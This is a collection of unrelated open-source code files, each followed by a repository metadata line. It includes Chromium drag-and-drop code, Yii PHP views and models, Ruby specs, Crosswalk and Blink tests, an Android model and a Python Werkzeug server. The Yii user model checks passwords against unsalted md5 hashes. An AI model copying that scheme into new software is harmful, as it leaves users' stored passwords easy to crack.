if ((*iter)->format_etc.cfFormat == format_etc->cfFormat &&
(*iter)->format_etc.lindex == format_etc->lindex &&
((*iter)->format_etc.tymed & format_etc->tymed)) {
// If medium is NULL, delay-rendering will be used.
if ((*iter)->medium) {
DuplicateMedium((*iter)->format_etc.cfFormat, (*iter)->medium, medium);
} else {
// Check if the left button is down.
bool is_left_button_down = (GetKeyState(VK_LBUTTON) & 0x8000) != 0;
bool wait_for_data = false;
if ((*iter)->in_delay_rendering) {
// Make sure the left button is up. Sometimes the drop target, like
// Shell, might be too aggresive in calling GetData when the left
// button is not released.
if (is_left_button_down)
return DV_E_FORMATETC;
// In async mode, we do not want to start waiting for the data before
// the async operation is started. This is because we want to postpone
// until Shell kicks off a background thread to do the work so that
// we do not block the UI thread.
if (!in_async_mode_ || async_operation_started_)
wait_for_data = true;
} else {
// If the left button is up and the target has not requested the data
// yet, it probably means that the target does not support delay-
// rendering. So instead, we wait for the data.
if (is_left_button_down) {
(*iter)->in_delay_rendering = true;
memset(medium, 0, sizeof(STGMEDIUM));
} else {
wait_for_data = true;
}
}
if (!wait_for_data)
return DV_E_FORMATETC;
// Notify the observer we start waiting for the data. This gives
// an observer a chance to end the drag and drop.
if (observer_)
observer_->OnWaitForData();
// Now we can start the download.
if ((*iter)->downloader.get()) {
(*iter)->downloader->Start(this);
if (!(*iter)->downloader->Wait()) {
is_aborting_ = true;
return DV_E_FORMATETC;
}
}
// The stored data should have been updated with the final version.
// So we just need to call this function again to retrieve it.
return GetData(format_etc, medium);
}
return S_OK;
}
++iter;
}
return DV_E_FORMATETC;
}
HRESULT DataObjectImpl::GetDataHere(FORMATETC* format_etc,
STGMEDIUM* medium) {
return DATA_E_FORMATETC;
}
HRESULT DataObjectImpl::QueryGetData(FORMATETC* format_etc) {
StoredData::const_iterator iter = contents_.begin();
while (iter != contents_.end()) {
if ((*iter)->format_etc.cfFormat == format_etc->cfFormat)
return S_OK;
++iter;
}
return DV_E_FORMATETC;
}
HRESULT DataObjectImpl::GetCanonicalFormatEtc(
FORMATETC* format_etc, FORMATETC* result) {
format_etc->ptd = NULL;
return E_NOTIMPL;
}
HRESULT DataObjectImpl::SetData(
FORMATETC* format_etc, STGMEDIUM* medium, BOOL should_release) {
RemoveData(*format_etc);
STGMEDIUM* local_medium = new STGMEDIUM;
if (should_release) {
*local_medium = *medium;
} else {
DuplicateMedium(format_etc->cfFormat, medium, local_medium);
}
DataObjectImpl::StoredDataInfo* info =
new DataObjectImpl::StoredDataInfo(format_etc->cfFormat, local_medium);
info->medium->tymed = format_etc->tymed;
info->owns_medium = !!should_release;
// Make newly added data appear first.
contents_.insert(contents_.begin(), info);
return S_OK;
}
HRESULT DataObjectImpl::EnumFormatEtc(
DWORD direction, IEnumFORMATETC** enumerator) {
if (direction == DATADIR_GET) {
FormatEtcEnumerator* e =
new FormatEtcEnumerator(contents_.begin(), contents_.end());
e->AddRef();
*enumerator = e;
return S_OK;
}
return E_NOTIMPL;
}
HRESULT DataObjectImpl::DAdvise(
FORMATETC* format_etc, DWORD advf, IAdviseSink* sink, DWORD* connection) {
return OLE_E_ADVISENOTSUPPORTED;
}
HRESULT DataObjectImpl::DUnadvise(DWORD connection) {
return OLE_E_ADVISENOTSUPPORTED;
}
HRESULT DataObjectImpl::EnumDAdvise(IEnumSTATDATA** enumerator) {
return OLE_E_ADVISENOTSUPPORTED;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IDataObjectAsyncCapability implementation:
HRESULT DataObjectImpl::EndOperation(
HRESULT result, IBindCtx* reserved, DWORD effects) {
async_operation_started_ = false;
return S_OK;
}
HRESULT DataObjectImpl::GetAsyncMode(BOOL* is_op_async) {
*is_op_async = in_async_mode_ ? TRUE : FALSE;
return S_OK;
}
HRESULT DataObjectImpl::InOperation(BOOL* in_async_op) {
*in_async_op = async_operation_started_ ? TRUE : FALSE;
return S_OK;
}
HRESULT DataObjectImpl::SetAsyncMode(BOOL do_op_async) {
in_async_mode_ = (do_op_async == TRUE);
return S_OK;
}
HRESULT DataObjectImpl::StartOperation(IBindCtx* reserved) {
async_operation_started_ = true;
return S_OK;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IUnknown implementation:
HRESULT DataObjectImpl::QueryInterface(const IID& iid, void** object) {
if (!object)
return E_POINTER;
if (IsEqualIID(iid, IID_IDataObject) || IsEqualIID(iid, IID_IUnknown)) {
*object = static_cast<IDataObject*>(this);
} else if (in_async_mode_ &&
IsEqualIID(iid, __uuidof(IDataObjectAsyncCapability))) {
*object = static_cast<IDataObjectAsyncCapability*>(this);
} else {
*object = NULL;
return E_NOINTERFACE;
}
AddRef();
return S_OK;
}
ULONG DataObjectImpl::AddRef() {
base::RefCountedThreadSafe<DownloadFileObserver>::AddRef();
return 0;
}
ULONG DataObjectImpl::Release() {
base::RefCountedThreadSafe<DownloadFileObserver>::Release();
return 0;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, private:
static STGMEDIUM* GetStorageForBytes(const char* data, size_t bytes) {
HANDLE handle = GlobalAlloc(GPTR, static_cast<int>(bytes));
base::win::ScopedHGlobal<char> scoped(handle);
size_t allocated = static_cast<size_t>(GlobalSize(handle));
memcpy(scoped.get(), data, allocated);
STGMEDIUM* storage = new STGMEDIUM;
storage->hGlobal = handle;
storage->tymed = TYMED_HGLOBAL;
storage->pUnkForRelease = NULL;
return storage;
}
template<class T>
static HGLOBAL CopyStringToGlobalHandle(const T& payload) {
int bytes =
static_cast<int>(payload.size() + 1) * sizeof(typename T::value_type);
HANDLE handle = GlobalAlloc(GPTR, bytes);
void* data = GlobalLock(handle);
size_t allocated = static_cast<size_t>(GlobalSize(handle));
memcpy(data, payload.c_str(), allocated);
static_cast<typename T::value_type*>(data)[payload.size()] = '\0';
GlobalUnlock(handle);
return handle;
}
static STGMEDIUM* GetStorageForString16(const string16& data) {
STGMEDIUM* storage = new STGMEDIUM;
storage->hGlobal = CopyStringToGlobalHandle<string16>(data);
storage->tymed = TYMED_HGLOBAL;
storage->pUnkForRelease = NULL;
return storage;
}
static STGMEDIUM* GetStorageForString(const std::string& data) {
STGMEDIUM* storage = new STGMEDIUM;
storage->hGlobal = CopyStringToGlobalHandle<std::string>(data);
storage->tymed = TYMED_HGLOBAL;
storage->pUnkForRelease = NULL;
return storage;
}
static void GetInternetShortcutFileContents(const GURL& url,
std::string* data) {
DCHECK(data);
static const std::string kInternetShortcutFileStart =
"[InternetShortcut]\r\nURL=";
static const std::string kInternetShortcutFileEnd =
"\r\n";
*data = kInternetShortcutFileStart + url.spec() + kInternetShortcutFileEnd;
}
static void CreateValidFileNameFromTitle(const GURL& url,
const string16& title,
string16* validated) {
if (title.empty()) {
if (url.is_valid()) {
*validated = net::GetSuggestedFilename(url, "", "", "", "",
std::string());
} else {
// Nothing else can be done, just use a default.
*validated =
l10n_util::GetStringUTF16(IDS_APP_UNTITLED_SHORTCUT_FILE_NAME);
}
} else {
*validated = title;
file_util::ReplaceIllegalCharactersInPath(validated, '-');
}
static const wchar_t extension[] = L".url";
static const size_t max_length = MAX_PATH - arraysize(extension);
if (validated->size() > max_length)
validated->erase(max_length);
*validated += extension;
}
static STGMEDIUM* GetStorageForFileName(const FilePath& path) {
const size_t kDropSize = sizeof(DROPFILES);
const size_t kTotalBytes =
kDropSize + (path.value().length() + 2) * sizeof(wchar_t);
HANDLE hdata = GlobalAlloc(GMEM_MOVEABLE, kTotalBytes);
base::win::ScopedHGlobal<DROPFILES> locked_mem(hdata);
DROPFILES* drop_files = locked_mem.get();
drop_files->pFiles = sizeof(DROPFILES);
drop_files->fWide = TRUE;
wchar_t* data = reinterpret_cast<wchar_t*>(
reinterpret_cast<BYTE*>(drop_files) + kDropSize);
const size_t copy_size = (path.value().length() + 1) * sizeof(wchar_t);
memcpy(data, path.value().c_str(), copy_size);
data[path.value().length() + 1] = L'\0'; // Double NULL
STGMEDIUM* storage = new STGMEDIUM;
storage->tymed = TYMED_HGLOBAL;
storage->hGlobal = hdata;
storage->pUnkForRelease = NULL;
return storage;
}
static STGMEDIUM* GetStorageForFileDescriptor(
const FilePath& path) {
string16 file_name = path.value();
DCHECK(!file_name.empty());
HANDLE hdata = GlobalAlloc(GPTR, sizeof(FILEGROUPDESCRIPTOR));
base::win::ScopedHGlobal<FILEGROUPDESCRIPTOR> locked_mem(hdata);
FILEGROUPDESCRIPTOR* descriptor = locked_mem.get();
descriptor->cItems = 1;
descriptor->fgd[0].dwFlags = FD_LINKUI;
wcsncpy_s(descriptor->fgd[0].cFileName, MAX_PATH, file_name.c_str(),
std::min(file_name.size(), static_cast<size_t>(MAX_PATH - 1u)));
STGMEDIUM* storage = new STGMEDIUM;
storage->tymed = TYMED_HGLOBAL;
storage->hGlobal = hdata;
storage->pUnkForRelease = NULL;
return storage;
}
///////////////////////////////////////////////////////////////////////////////
// OSExchangeData, public:
// static
OSExchangeData::Provider* OSExchangeData::CreateProvider() {
return new OSExchangeDataProviderWin();
}
// static
OSExchangeData::CustomFormat OSExchangeData::RegisterCustomFormat(
const std::string& type) {
return RegisterClipboardFormat(ASCIIToUTF16(type).c_str());
}
} // namespace ui
| nacl-webkit/chrome_deps | ui/base/dragdrop/os_exchange_data_provider_win.cc | C++ | bsd-3-clause | 33,704 |
<?php
use yii\helpers\Html;
use yii\widgets\ActiveForm;
/* @var $this yii\web\View */
/* @var $model app\models\SentitemsSearch */
/* @var $form yii\widgets\ActiveForm */
?>
<div class="sentitems-search">
<?php $form = ActiveForm::begin([
'action' => ['index'],
'method' => 'get',
]); ?>
<?= $form->field($model, 'UpdatedInDB') ?>
<?= $form->field($model, 'InsertIntoDB') ?>
<?= $form->field($model, 'SendingDateTime') ?>
<?= $form->field($model, 'DeliveryDateTime') ?>
<?= $form->field($model, 'Text') ?>
<?php // echo $form->field($model, 'DestinationNumber') ?>
<?php // echo $form->field($model, 'Coding') ?>
<?php // echo $form->field($model, 'UDH') ?>
<?php // echo $form->field($model, 'SMSCNumber') ?>
<?php // echo $form->field($model, 'Class') ?>
<?php // echo $form->field($model, 'TextDecoded') ?>
<?php // echo $form->field($model, 'ID') ?>
<?php // echo $form->field($model, 'SenderID') ?>
<?php // echo $form->field($model, 'SequencePosition') ?>
<?php // echo $form->field($model, 'Status') ?>
<?php // echo $form->field($model, 'StatusError') ?>
<?php // echo $form->field($model, 'TPMR') ?>
<?php // echo $form->field($model, 'RelativeValidity') ?>
<?php // echo $form->field($model, 'CreatorID') ?>
<div class="form-group">
<?= Html::submitButton('Search', ['class' => 'btn btn-primary']) ?>
<?= Html::resetButton('Reset', ['class' => 'btn btn-default']) ?>
</div>
<?php ActiveForm::end(); ?>
</div>
| nmfzone/yiisms | views/sentitems/_search.php | PHP | bsd-3-clause | 1,573 |
<?php
namespace app\modules\usuarios\models;
use Yii;
use kartik\password\StrengthValidator;
/**
* This is the model class for table "usuarios".
*
* @property integer $id_usuario
* @property integer $fl_perfil
* @property integer $fl_persona
* @property string $username
* @property string $clave
* @property string $ultimo_login
* @property integer $status
*
* @property Recursos[] $recursos
* @property Reportes[] $reportes
* @property Perfiles $flPerfil
* @property Personas $flPersona
*/
class Usuarios extends \yii\db\ActiveRecord implements \yii\web\IdentityInterface {
public $nombre_perfil;
public $nombre_persona;
public $apellido_persona;
public $validate_clave;
/**
* @inheritdoc
*/
public static function tableName() {
return 'usuarios';
}
/**
* @inheritdoc
*/
public function rules() {
return [
[['fl_perfil', 'fl_persona', 'username', 'clave', 'status'], 'required'],
[['fl_perfil', 'fl_persona', 'status'], 'integer'],
[['ultimo_login'], 'safe'],
[['clave'], 'string', 'max' => 200],
[['clave'], StrengthValidator::className(), 'preset' => 'normal', 'userAttribute' => 'username', 'on' => 'create'],
['validate_clave', 'required', 'on' => 'create'],
['validate_clave', 'required', 'on' => 'update'],
['validate_clave', 'compare', 'compareAttribute' => 'clave', 'message' => "Passwords no coinciden"],
[['fl_perfil'], 'exist', 'skipOnError' => true, 'targetClass' => Perfiles::className(), 'targetAttribute' => ['fl_perfil' => 'id_perfile']],
[['fl_persona'], 'exist', 'skipOnError' => true, 'targetClass' => Personas::className(), 'targetAttribute' => ['fl_persona' => 'id_persona']],
[['id_usuario'], 'unique'],
[['username'], 'unique', 'message' => 'Alias ya ultilizado'],
[['fl_persona'], 'unique', 'message' => 'Esta persona ya posee un usuario'],
];
}
/**
* @inheritdoc
*/
public function attributeLabels() {
return [
'id_usuario' => Yii::t('app', 'Id Usuario'),
'fl_perfil' => Yii::t('app', 'Perfil'),
'fl_persona' => Yii::t('app', 'Persona'),
'username' => Yii::t('app', 'Alias'),
'clave' => Yii::t('app', 'Password'),
'ultimo_login' => Yii::t('app', 'Ultimo Login'),
'status' => Yii::t('app', 'Status'),
'validate_clave' => Yii::t('app', 'Re-Password'),
];
}
/**
* @return \yii\db\ActiveQuery
*/
public function getRecursos() {
return $this->hasMany(Recursos::className(), ['fk_usuario' => 'id_usuario']);
}
/**
* @return \yii\db\ActiveQuery
*/
public function getReportes() {
return $this->hasMany(Reportes::className(), ['fk_usuario' => 'id_usuario']);
}
/**
* @return \yii\db\ActiveQuery
*/
public function getFlPerfil() {
return $this->hasOne(Perfiles::className(), ['id_perfile' => 'fl_perfil']);
}
/**
* @return \yii\db\ActiveQuery
*/
public function getFlPersona() {
return $this->hasOne(Personas::className(), ['id_persona' => 'fl_persona']);
}
/**
* @inheritdoc
* @return UsuariosQuery the active query used by this AR class.
*/
public static function find() {
return new query\UsuariosQuery(get_called_class());
}
public function getAuthKey() {
throw new \yii\base\NotSupportedException();
}
public function getId() {
return $this->id_usuario;
}
public function validateAuthKey($authKey) {
throw new \yii\base\NotSupportedException();
}
public static function findIdentity($id) {
return self::findOne($id);
}
public static function findIdentityByAccessToken($token, $type = null) {
throw new \yii\base\NotSupportedException();
}
public static function findByLogin($username) {
return self::findOne(['username' => $username]);
}
public function validatePassword($password) {
return $this->clave === md5($password);
}
}
| delgado161/extranet | modules/usuarios/models/Usuarios.php | PHP | bsd-3-clause | 4,242 |
require 'spec_helper'
describe QuestionController do
describe "GET answer" do
it "assigns quantities" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:quantities).map{|x| x.to_s}.should eql ['10.0 t', '1000.0 km']
end
it "assigns terms" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:terms).should eql ['shipping', 'stuff']
end
it "assigns categories" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:categories).should eql [ "Etching_and_CVD_cleaning_in_the_Electronics_Industry",
"DEFRA_freight_transport_methodology",
"Freight_transport_by_Greenhouse_Gas_Protocol" ]
end
it "assigns a thinking message" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:message).should_not be_blank
end
end
describe "GET detail" do
it "gets results with a single input quantity" do
get :detailed_answer, :quantities => '100.0 km', :terms => 'truck', :category => 'Generic_van_transport'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should eql 27.18
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/Generic_van_transport/data/cng/up%20to%203.5%20tonnes/result/false/true/none/100.0;km/false/none/0/-1/0/true/false/false'
end
it "gets results with two input quantities" do
get :detailed_answer, :quantities => '100.0 km,1.0 t', :terms => 'truck', :category => 'DEFRA_freight_transport_methodology'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should eql 80.7365279
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/DEFRA_freight_transport_methodology/data/van/petrol/1.305-1.74%20t/result/100.0;km/1.0;t'
end
it "gets results with IATA codes" do
get :detailed_answer, :quantities => 'from:LHR,to:LAX', :terms => 'fly', :category => 'Great_Circle_flight_methodology'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should be_within(1e-9).of(1064.49102031516)
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/Great_Circle_flight_methodology/data/great%20circle%20route/result/LHR/LAX/false/1/-999/-999/-999/-999/none/average/1/1.9/false'
end
end
end | OpenAMEE/askamee | spec/controllers/question_controller_spec.rb | Ruby | bsd-3-clause | 2,459 |
// Copyright (c) 2013 Intel Corporation. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "xwalk/sysapps/common/common_api_browsertest.h"
#include "base/path_service.h"
#include "base/strings/utf_string_conversions.h"
#include "content/public/test/browser_test.h"
#include "content/public/test/browser_test_utils.h"
#include "content/public/test/test_utils.h"
#include "net/base/net_util.h"
#include "xwalk/extensions/browser/xwalk_extension_service.h"
#include "xwalk/extensions/common/xwalk_extension.h"
#include "xwalk/runtime/browser/runtime.h"
#include "xwalk/sysapps/common/binding_object.h"
#include "xwalk/test/base/in_process_browser_test.h"
#include "xwalk/test/base/xwalk_test_utils.h"
using namespace xwalk::extensions; // NOLINT
using xwalk::sysapps::BindingObject;
SysAppsTestExtension::SysAppsTestExtension() {
set_name("sysapps_common_test");
set_javascript_api(
"var v8tools = requireNative('v8tools');"
""
"var internal = requireNative('internal');"
"internal.setupInternalExtension(extension);"
""
"var common = requireNative('sysapps_common');"
"common.setupSysAppsCommon(internal, v8tools);"
""
"var Promise = requireNative('sysapps_promise').Promise;"
""
"var TestObject = function() {"
" common.BindingObject.call(this, common.getUniqueId());"
" common.EventTarget.call(this);"
" internal.postMessage('TestObjectConstructor', [this._id]);"
" this._addMethod('isTestEventActive', true);"
" this._addMethod('fireTestEvent', true);"
" this._addMethodWithPromise('makeFulfilledPromise', Promise);"
" this._addMethodWithPromise('makeRejectedPromise', Promise);"
" this._addEvent('test');"
" this._registerLifecycleTracker();"
"};"
""
"TestObject.prototype = new common.EventTargetPrototype();"
""
"exports.v8tools = v8tools;"
"exports.TestObject = TestObject;"
"exports.hasObject = function(object_id, callback) {"
" internal.postMessage('hasObject', [object_id], callback);"
"};");
}
XWalkExtensionInstance* SysAppsTestExtension::CreateInstance() {
return new SysAppsTestExtensionInstance();
}
SysAppsTestExtensionInstance::SysAppsTestExtensionInstance()
: handler_(this),
store_(&handler_) {
handler_.Register("TestObjectConstructor",
base::Bind(&SysAppsTestExtensionInstance::OnSysAppsTestObjectContructor,
base::Unretained(this)));
handler_.Register("hasObject",
base::Bind(&SysAppsTestExtensionInstance::OnHasObject,
base::Unretained(this)));
}
void SysAppsTestExtensionInstance::HandleMessage(scoped_ptr<base::Value> msg) {
handler_.HandleMessage(msg.Pass());
}
void SysAppsTestExtensionInstance::OnSysAppsTestObjectContructor(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
std::string object_id;
ASSERT_TRUE(info->arguments()->GetString(0, &object_id));
scoped_ptr<BindingObject> obj(new SysAppsTestObject);
store_.AddBindingObject(object_id, obj.Pass());
}
void SysAppsTestExtensionInstance::OnHasObject(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
std::string object_id;
ASSERT_TRUE(info->arguments()->GetString(0, &object_id));
scoped_ptr<base::ListValue> result(new base::ListValue());
result->AppendBoolean(store_.HasObjectForTesting(object_id));
info->PostResult(result.Pass());
}
SysAppsTestObject::SysAppsTestObject() : is_test_event_active_(false) {
handler_.Register("isTestEventActive",
base::Bind(&SysAppsTestObject::OnIsTestEventActive,
base::Unretained(this)));
handler_.Register("fireTestEvent",
base::Bind(&SysAppsTestObject::OnFireTestEvent,
base::Unretained(this)));
handler_.Register("makeFulfilledPromise",
base::Bind(&SysAppsTestObject::OnMakeFulfilledPromise,
base::Unretained(this)));
handler_.Register("makeRejectedPromise",
base::Bind(&SysAppsTestObject::OnMakeRejectedPromise,
base::Unretained(this)));
}
void SysAppsTestObject::StartEvent(const std::string& type) {
if (type == "test")
is_test_event_active_ = true;
}
void SysAppsTestObject::StopEvent(const std::string& type) {
if (type == "test")
is_test_event_active_ = false;
}
void SysAppsTestObject::OnIsTestEventActive(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
scoped_ptr<base::ListValue> result(new base::ListValue());
result->AppendBoolean(is_test_event_active_);
info->PostResult(result.Pass());
}
void SysAppsTestObject::OnFireTestEvent(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
scoped_ptr<base::ListValue> data(new base::ListValue());
data->AppendString("Lorem ipsum");
DispatchEvent("test", data.Pass());
scoped_ptr<base::ListValue> result(new base::ListValue());
info->PostResult(result.Pass());
}
void SysAppsTestObject::OnMakeFulfilledPromise(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
scoped_ptr<base::ListValue> result(new base::ListValue());
result->AppendString("Lorem ipsum"); // Data.
result->AppendString(""); // Error, empty == no error.
info->PostResult(result.Pass());
}
void SysAppsTestObject::OnMakeRejectedPromise(
scoped_ptr<XWalkExtensionFunctionInfo> info) {
scoped_ptr<base::ListValue> result(new base::ListValue());
result->AppendString(""); // Data.
result->AppendString("Lorem ipsum"); // Error, !empty == error.
info->PostResult(result.Pass());
}
class SysAppsCommonTest : public InProcessBrowserTest {
public:
virtual void SetUp() {
XWalkExtensionService::SetCreateUIThreadExtensionsCallbackForTesting(
base::Bind(&SysAppsCommonTest::CreateExtensions,
base::Unretained(this)));
InProcessBrowserTest::SetUp();
}
void CreateExtensions(XWalkExtensionVector* extensions) {
extensions->push_back(new SysAppsTestExtension);
}
};
IN_PROC_BROWSER_TEST_F(SysAppsCommonTest, SysAppsCommon) {
const base::string16 passString = base::ASCIIToUTF16("Pass");
const base::string16 failString = base::ASCIIToUTF16("Fail");
content::RunAllPendingInMessageLoop();
content::TitleWatcher title_watcher(runtime()->web_contents(), passString);
title_watcher.AlsoWaitForTitle(failString);
base::FilePath test_file;
PathService::Get(base::DIR_SOURCE_ROOT, &test_file);
test_file = test_file
.Append(FILE_PATH_LITERAL("xwalk"))
.Append(FILE_PATH_LITERAL("sysapps"))
.Append(FILE_PATH_LITERAL("common"))
.Append(FILE_PATH_LITERAL("common_api_browsertest.html"));
xwalk_test_utils::NavigateToURL(runtime(), net::FilePathToFileURL(test_file));
EXPECT_EQ(passString, title_watcher.WaitAndGetTitle());
}
| shaochangbin/crosswalk | sysapps/common/common_api_browsertest.cc | C++ | bsd-3-clause | 6,721 |
package org.grassroot.android.models.responses;
import org.grassroot.android.models.Group;
import org.grassroot.android.models.helpers.RealmString;
import io.realm.RealmList;
import io.realm.RealmObject;
/**
* Created by luke on 2016/07/13.
*/
public class GroupsChangedResponse extends RealmObject {
private RealmList<Group> addedAndUpdated = new RealmList<>();
private RealmList<RealmString> removedUids = new RealmList<>();
public GroupsChangedResponse() {
}
public RealmList<Group> getAddedAndUpdated() {
return addedAndUpdated;
}
public void setAddedAndUpdated(RealmList<Group> addedAndUpdated) {
this.addedAndUpdated = addedAndUpdated;
}
public RealmList<RealmString> getRemovedUids() {
return removedUids;
}
public void setRemovedUids(RealmList<RealmString> removedUids) {
this.removedUids = removedUids;
}
@Override
public String toString() {
return "GroupsChangedResponse{" +
"addedAndUpdated=" + addedAndUpdated +
", removedUids=" + removedUids +
'}';
}
}
| grassrootza/grassroot-android | app/src/main/java/org/grassroot/android/models/responses/GroupsChangedResponse.java | Java | bsd-3-clause | 1,127 |
<?php
use yii\helpers\Html;
use yii\widgets\ActiveForm;
/* @var $this yii\web\View */
/* @var $model app\models\Facultycourse */
/* @var $form yii\widgets\ActiveForm */
?>
<div class="facultycourse-form">
<?php $form = ActiveForm::begin(); ?>
<?= $form->field($model, 'courses')->dropDownList($courses, ['multiple' => true, 'size' => 30]) ?>
<div class="form-group">
<?= Html::submitButton(Yii::t('app', 'Save'), ['class' => 'btn btn-success']) ?>
</div>
<?php ActiveForm::end(); ?>
</div>
| tbcabagay/ficdatabase | modules/main/views/facultycourse/_form.php | PHP | bsd-3-clause | 526 |
__author__ = 'Bohdan Mushkevych'
from threading import Thread
from werkzeug.wrappers import Request
from werkzeug.wsgi import ClosingIterator
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.exceptions import HTTPException, NotFound
from werkzeug.serving import run_simple
from synergy.conf import settings
from synergy.system.system_logger import get_logger
from synergy.scheduler.scheduler_constants import PROCESS_MX
from synergy.mx.utils import STATIC_PATH, local, local_manager, url_map, jinja_env
from synergy.mx import views
from flow.mx import views as flow_views
from flow.mx import STATIC_FLOW_ENDPOINT, STATIC_FLOW_PATH
import socket
socket.setdefaulttimeout(10.0) # set default socket timeout at 10 seconds
class MX(object):
""" MX stands for Management Extension and represents HTTP server serving UI front-end for Synergy Scheduler """
def __init__(self, mbean):
local.application = self
self.mx_thread = None
self.mbean = mbean
jinja_env.globals['mbean'] = mbean
self.dispatch = SharedDataMiddleware(self.dispatch, {
f'/scheduler/static': STATIC_PATH,
f'/{STATIC_FLOW_ENDPOINT}': STATIC_FLOW_PATH,
})
# during the get_logger call a 'werkzeug' logger will be created
# later, werkzeug._internal.py -> _log() will assign the logger to global _logger variable
self.logger = get_logger(PROCESS_MX)
def dispatch(self, environ, start_response):
local.application = self
request = Request(environ)
local.url_adapter = adapter = url_map.bind_to_environ(environ)
local.request = request
try:
endpoint, values = adapter.match()
# first - try to read from synergy.mx.views
handler = getattr(views, endpoint, None)
if not handler:
# otherwise - read from flow.mx.views
handler = getattr(flow_views, endpoint)
response = handler(request, **values)
except NotFound:
response = views.not_found(request)
response.status_code = 404
except HTTPException as e:
response = e
return ClosingIterator(response(environ, start_response),
[local_manager.cleanup])
def __call__(self, environ, start_response):
return self.dispatch(environ, start_response)
def start(self, hostname=None, port=None):
""" Spawns a new HTTP server, residing on defined hostname and port
:param hostname: the default hostname the server should listen on.
:param port: the default port of the server.
"""
if hostname is None:
hostname = settings.settings['mx_host']
if port is None:
port = settings.settings['mx_port']
reloader = False # use_reloader: the default setting for the reloader.
debugger = False #
evalex = True # should the exception evaluation feature be enabled?
threaded = False # True if each request is handled in a separate thread
processes = 1 # if greater than 1 then handle each request in a new process
reloader_interval = 1 # the interval for the reloader in seconds.
static_files = None # static_files: optional dict of static files.
extra_files = None # extra_files: optional list of extra files to track for reloading.
ssl_context = None # ssl_context: optional SSL context for running server in HTTPS mode.
self.mx_thread = Thread(target=run_simple(hostname=hostname,
port=port,
application=self,
use_debugger=debugger,
use_evalex=evalex,
extra_files=extra_files,
use_reloader=reloader,
reloader_interval=reloader_interval,
threaded=threaded,
processes=processes,
static_files=static_files,
ssl_context=ssl_context))
self.mx_thread.daemon = True
self.mx_thread.start()
def stop(self):
""" method stops currently running HTTP server, if any
:see: `werkzeug.serving.make_environ`
http://flask.pocoo.org/snippets/67/ """
func = jinja_env.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('MX Error: no Shutdown Function registered for the Werkzeug Server')
func()
if __name__ == '__main__':
from synergy.scheduler.scheduler_constants import PROCESS_SCHEDULER
from synergy.scheduler.synergy_scheduler import Scheduler
scheduler = Scheduler(PROCESS_SCHEDULER)
app = MX(scheduler)
app.start()
| mushkevych/scheduler | synergy/mx/synergy_mx.py | Python | bsd-3-clause | 5,162 |
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "modules/fetch/ReadableStreamDataConsumerHandle.h"
#include "bindings/core/v8/ReadableStreamOperations.h"
#include "bindings/core/v8/ScriptState.h"
#include "bindings/core/v8/V8BindingMacros.h"
#include "bindings/core/v8/V8GCController.h"
#include "bindings/core/v8/V8RecursionScope.h"
#include "core/dom/Document.h"
#include "core/testing/DummyPageHolder.h"
#include "modules/fetch/DataConsumerHandleTestUtil.h"
#include "platform/heap/Handle.h"
#include "platform/testing/UnitTestHelpers.h"
#include "public/platform/WebDataConsumerHandle.h"
#include "testing/gmock/include/gmock/gmock.h"
#include "testing/gtest/include/gtest/gtest.h"
#include <v8.h>
// TODO(yhirano): Add cross-thread tests once the handle gets thread-safe.
namespace blink {
namespace {
using ::testing::InSequence;
using ::testing::StrictMock;
using Checkpoint = StrictMock<::testing::MockFunction<void(int)>>;
using Result = WebDataConsumerHandle::Result;
const Result kOk = WebDataConsumerHandle::Ok;
const Result kShouldWait = WebDataConsumerHandle::ShouldWait;
const Result kUnexpectedError = WebDataConsumerHandle::UnexpectedError;
const Result kDone = WebDataConsumerHandle::Done;
using Flags = WebDataConsumerHandle::Flags;
const Flags kNone = WebDataConsumerHandle::FlagNone;
class MockClient : public GarbageCollectedFinalized<MockClient>, public WebDataConsumerHandle::Client {
public:
static StrictMock<MockClient>* create() { return new StrictMock<MockClient>(); }
MOCK_METHOD0(didGetReadable, void());
DEFINE_INLINE_TRACE() {}
protected:
MockClient() = default;
};
class ReadableStreamDataConsumerHandleTest : public ::testing::Test {
public:
ReadableStreamDataConsumerHandleTest()
: m_page(DummyPageHolder::create())
{
}
ScriptState* getScriptState() { return ScriptState::forMainWorld(m_page->document().frame()); }
v8::Isolate* isolate() { return getScriptState()->isolate(); }
v8::MaybeLocal<v8::Value> eval(const char* s)
{
v8::Local<v8::String> source;
v8::Local<v8::Script> script;
V8RecursionScope::MicrotaskSuppression microtasks(isolate());
if (!v8Call(v8::String::NewFromUtf8(isolate(), s, v8::NewStringType::kNormal), source)) {
ADD_FAILURE();
return v8::MaybeLocal<v8::Value>();
}
if (!v8Call(v8::Script::Compile(getScriptState()->context(), source), script)) {
ADD_FAILURE() << "Compilation fails";
return v8::MaybeLocal<v8::Value>();
}
return script->Run(getScriptState()->context());
}
v8::MaybeLocal<v8::Value> evalWithPrintingError(const char* s)
{
v8::TryCatch block(isolate());
v8::MaybeLocal<v8::Value> r = eval(s);
if (block.HasCaught()) {
ADD_FAILURE() << toCoreString(block.Exception()->ToString(isolate())).utf8().data();
block.ReThrow();
}
return r;
}
PassOwnPtr<ReadableStreamDataConsumerHandle> createHandle(ScriptValue stream)
{
NonThrowableExceptionState es;
ScriptValue reader = ReadableStreamOperations::getReader(getScriptState(), stream, es);
